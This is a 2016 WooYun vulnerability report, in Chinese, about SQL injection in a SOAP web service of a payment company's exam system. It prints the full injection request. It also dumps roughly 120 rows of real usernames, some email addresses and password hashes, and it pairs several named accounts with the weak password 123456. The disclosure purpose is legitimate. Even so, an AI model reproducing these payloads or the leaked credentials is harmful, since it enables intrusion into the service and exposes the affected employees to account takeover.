当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0221978

漏洞标题:某大型第三方支付机构考试系统SOAP注入涉及用户密码(DBA权限+9库)

相关厂商:银联商务

漏洞作者: 0x 80

提交时间:2016-06-23 10:41

修复时间:2016-06-27 15:05

公开时间:2016-06-27 15:05

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某大型第三方支付机构考试系统SOAP注入涉及用户密码(DBA权限+9库)

详细说明:

http://**.**.**.**/webservice/MuiltiExam.asmx?op=DeleteSendedKscj
http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl
SOAP接口存在注入

捕获881.GIF


捕获88888.GIF


POST /webservice/MuiltiExam.asmx HTTP/1.1
Host: **.**.**.**
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://**.**.**.**/DeleteSendedKscj"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soap="http://**.**.**.**/soap/envelope/">
  <soap:Body>
    <DeleteSendedKscj xmlns="http://**.**.**.**/">
      <p_KscjIDList>'having</p_KscjIDList>
    </DeleteSendedKscj>
  </soap:Body>
</soap:Envelope>


捕获789.GIF


经过查找,发现,用户密码都保存在StudentInfo里
果断列出
一共700条记录

捕获99999.GIF


lixiumei      | <blank>                | <blank> | 479E285A022B9CB4
     |
 liyang        | <blank>                | <blank> | 479E285A022B9CB4
     |
 liyongcheng   | <blank>                | <blank> | 479E285A022B9CB4
     |
 liyue         | <blank>                | <blank> | 479E285A022B9CB4
     |
 lizhao        | <blank>                | <blank> | 479E285A022B9CB4
     |
 lizhong       | <blank>                | <blank> | 479E285A022B9CB4
     |
 ljbai         | <blank>                | <blank> | 479E285A022B9CB4
     |
 ljzeng        | <blank>                | <blank> | 479E285A022B9CB4
     |
 llgeng        | <blank>                | <blank> | 479E285A022B9CB4
     |
 lluo          | lluo@**.**.**.**      | <blank> | 479E285A022B9CB4
     |
 lmhao         | <blank>                | <blank> | 58AC395097A22F72
     |
 lnzhao        | <blank>                | <blank> | 54F97C5672F5BE01
     |
 lpeng         | <blank>                | <blank> | 3958D708ABBD18F5829A484A3
C3D6 |
 lpyu          | <blank>                | <blank> | C09FF02294F9E52F
     |
 lsun          | <blank>                | <blank> | 479E285A022B9CB4
     |
 lswan         | lswan@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 luhanliang    | <blank>                | <blank> | 1B5291DD16A01F1E39895E885
2807 |
 lujun         | <blank>                | <blank> | 479E285A022B9CB4
     |
 luomeiguang   | <blank>                | <blank> | 479E285A022B9CB4
     |
 luowei        | <blank>                | <blank> | 479E285A022B9CB4
     |
 lupeng        | <blank>                | <blank> | 479E285A022B9CB4
     |
 luyang1       | <blank>                | <blank> | 82A9983FEE532426
     |
 lwan          | <blank>                | <blank> | 0DF27AD1616400C165B0327FB
87E9 |
 lwliu         | <blank>                | <blank> | 479E285A022B9CB4
     |
 lwzhou        | lwzhou@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 lyang         | lyang@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 lyfan         | 935113149@**.**.**.**       | <blank> | 479E285A022B9CB4
     |
 lysun         | <blank>                | <blank> | 479E285A022B9CB4
     |
 lyzheng       | lyzheng@**.**.**.**   | <blank> | 479E285A022B9CB4
     |
 lzhao         | <blank>                | <blank> | 479E285A022B9CB4
     |
 lzmeng        | <blank>                | <blank> | 479E285A022B9CB4
     |
 make          | <blank>                | <blank> | 479E285A022B9CB4
     |
 mayan         | <blank>                | <blank> | B7330939422D9E2E
     |
 mchang        | mchang@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 mengxu        | <blank>                | <blank> | 4545A5EA2CF35C0A
     |
 miaolu        | <blank>                | <blank> | 243234EA86D7766A
     |
 mli           | <blank>                | <blank> | 13C32499F222FDAF
     |
 mlkang        | <blank>                | <blank> | 479E285A022B9CB4
     |
 morigen       | <blank>                | <blank> | 479E285A022B9CB4
     |
 mqzhu         | mqzhu@**.**.**.**     | <blank> | 243234EA86D7766A
     |
 mrg           | <blank>                | <blank> | CEF5109E98B16D0D
     |
 mtan          | <blank>                | <blank> | 479E285A022B9CB4
     |
 mxzhou        | <blank>                | <blank> | 479E285A022B9CB4
     |
 myfan         | <blank>                | <blank> | AE6034BD0094EFC3
     |
 myliu         | <blank>                | <blank> | 221F814559A2B711
     |
 mzhang        | <blank>                | <blank> | 243234EA86D7766A
     |
 nanma         | <blank>                | <blank> | 479E285A022B9CB4
     |
 ningli        | <blank>                | <blank> | 479E285A022B9CB4
     |
 nma           | <blank>                | <blank> | B0D948EC1D8CEFE5
     |
 nrmu          | <blank>                | <blank> | 479E285A022B9CB4
     |
 pangqingyuan  | <blank>                | <blank> | 479E285A022B9CB4
     |
 panxingyu     | <blank>                | <blank> | 479E285A022B9CB4
     |
 pbwei         | <blank>                | <blank> | 479E285A022B9CB4
     |
 pcli          | pcli@**.**.**.**      | <blank> | 770F3B8CF538FE46
     |
 pengc         | <blank>                | <blank> | 479E285A022B9CB4
     |
 pengzhao      | <blank>                | <blank> | 479E285A022B9CB4
     |
 pengzhou      | <blank>                | <blank> | 479E285A022B9CB4
     |
 phu           | <blank>                | <blank> | 479E285A022B9CB4
     |
 phuang        | phuang@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 phxia         | phxia@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 phzhao        | phzhao@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 pingjuan      | <blank>                | <blank> | 479E285A022B9CB4
     |
 pingliu       | <blank>                | <blank> | 479E285A022B9CB4
     |
 pmwang        | <blank>                | <blank> | CA4B423E67EF6530D50CE8E49
7D88 |
 pzhou1        | <blank>                | <blank> | 243234EA86D7766A
     |
 qianwu        | <blank>                | <blank> | 479E285A022B9CB4
     |
 qichen        | <blank>                | <blank> | 479E285A022B9CB4
     |
 qjli          | qjli@**.**.**.**      | <blank> | 479E285A022B9CB4
     |
 qlzhao        | qlchen@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 qniu          | <blank>                | <blank> | 479E285A022B9CB4
     |
 qniu1         | <blank>                | <blank> | B0D948EC1D8CEFE5
     |
 qptang        | qptang@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 qqliu         | <blank>                | <blank> | E02903083F8CFCA3
     |
 qrzhu         | qrzhu@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 qydu          | <blank>                | <blank> | EA3E5F6FF633D599
     |
 qzhang        | <blank>                | <blank> | 479E285A022B9CB4
     |
 renyao        | <blank>                | <blank> | 479E285A022B9CB4
     |
 rfchen        | <blank>                | <blank> | 479E285A022B9CB4
     |
 rppang        | <blank>                | <blank> | 34CD945D82FB6E84
     |
 rrzhou        | rrzhou@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 rtang         | rtang@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 rtzong        | <blank>                | <blank> | 479E285A022B9CB4
     |
 ruanrongheng  | <blank>                | <blank> | 479E285A022B9CB4
     |
 ruili         | <blank>                | <blank> | 479E285A022B9CB4
     |
 ruizhang      | rzhang@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 rxhe          | <blank>                | <blank> | 479E285A022B9CB4
     |
 rzhang        | <blank>                | <blank> | 479E285A022B9CB4
     |
 rztang        | <blank>                | <blank> | 479E285A022B9CB4
     |
 sbhan         | <blank>                | <blank> | 479E285A022B9CB4
     |
 schao         | <blank>                | <blank> | 479E285A022B9CB4
     |
 sgjia         | <blank>                | <blank> | 479E285A022B9CB4
     |
 sgma          | sgma@**.**.**.**      | <blank> | 479E285A022B9CB4
     |
 shijun        | <blank>                | <blank> | 479E285A022B9CB4
     |
 shilan        | <blank>                | <blank> | 479E285A022B9CB4
     |
 shuang        | 12107685@**.**.**.**        | <blank> | 479E285A022B9CB4
     |
 shwang1       | <blank>                | <blank> | E2BA32BC495A9ECB
     |
 shxu          | <blank>                | <blank> | 243234EA86D7766A
     |
 spzhu         | spzhu@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 sqjy          | <blank>                | <blank> | 479E285A022B9CB4
     |
 sqliang       | 719553592@**.**.**.**       | <blank> | 479E285A022B9CB4
     |
 sshan         | <blank>                | <blank> | CEF5109E98B16D0D
     |
 stchen        | stchen@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 stgao         | <blank>                | <blank> | 479E285A022B9CB4
     |
 sujing        | <blank>                | <blank> | 479E285A022B9CB4
     |
 sunchangming  | <blank>                | <blank> | 479E285A022B9CB4
     |
 suyoumei      | <blank>                | <blank> | 479E285A022B9CB4
     |
 swu           | <blank>                | <blank> | 243234EA86D7766A
     |
 swzhang       | <blank>                | <blank> | 479E285A022B9CB4
     |
 sxdeng        | sxdeng@**.**.**.**    | <blank> | 479E285A022B9CB4
     |
 syang         | syang@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 syfeng        | <blank>                | <blank> | 479E285A022B9CB4
     |
 szyao         | <blank>                | <blank> | 479E285A022B9CB4
     |
 tangxianan    | <blank>                | <blank> | 243234EA86D7766A
     |
 taohe         | <blank>                | <blank> | 479E285A022B9CB4
     |
 tdai          | <blank>                | <blank> | 479E285A022B9CB4
     |
 terigen       | <blank>                | <blank> | 479E285A022B9CB4
     |
 tingma        | <blank>                | <blank> | 479E285A022B9CB4
     |
 tingzhang     | <blank>                | <blank> | 479E285A022B9CB4
     |
 tjliu         | tjliu@**.**.**.**     | <blank> | 479E285A022B9CB4
     |
 tongjun       | <blank>                | <blank> | 243234EA86D7766A
     |
 tongyonggang  | <blank>                | <blank> | 243234EA86D7766A
     |
 ttxiao        | <blank>                | <blank> | 479E285A022B9CB4
     |
 ttxu          | <blank>                | <blank> | A7B4C13DF4AD0906F56534972
FCA3 |
 tzhang        | <blank>                | <blank> | 101C34ABEE10A006
     |
 wangbin       | <blank>                | <blank> | 479E285A022B9CB4
     |
 wangchangcai  | <blank>                | <blank> | 479E285A022B9CB4
     |
 wangchen      | <blank>                | <blank> | 479E285A022B9CB4
     |
 wangcheng     | <blank>                | <blank> | 479E285A022B9CB4
     |
 wanggang      | <blank>                | <blank> | 479E285A022B9CB4
     |
 wanggang1     | <blank>                | <blank> | 479E285A022B9CB4
     |
 wangguogao    | <blank>                | <blank> | 479E285A022B9CB4
     |
 wanghao       | <blank>                | <blank> | E4DE688C2DC86CB7
     |
 wangheyou     | <blank>                | <blank> | 479E285A022B9CB4
     |
 wangkanglang  | <blank>                | <blank> | 243234EA86D7766A
     |
 wangkun       | <blank>                | <blank> | 479E285A022B9CB4


虽然密码已被加密
但还是存在很多弱口令
http://**.**.**.**/Login.aspx
随便列举
jwang1 123456
chzhang 123456
cshhan 123456
daijianbei 123456
heli 123456

捕获111.GIF


捕获98989.GIF


漏洞证明:

http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-27 15:05

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无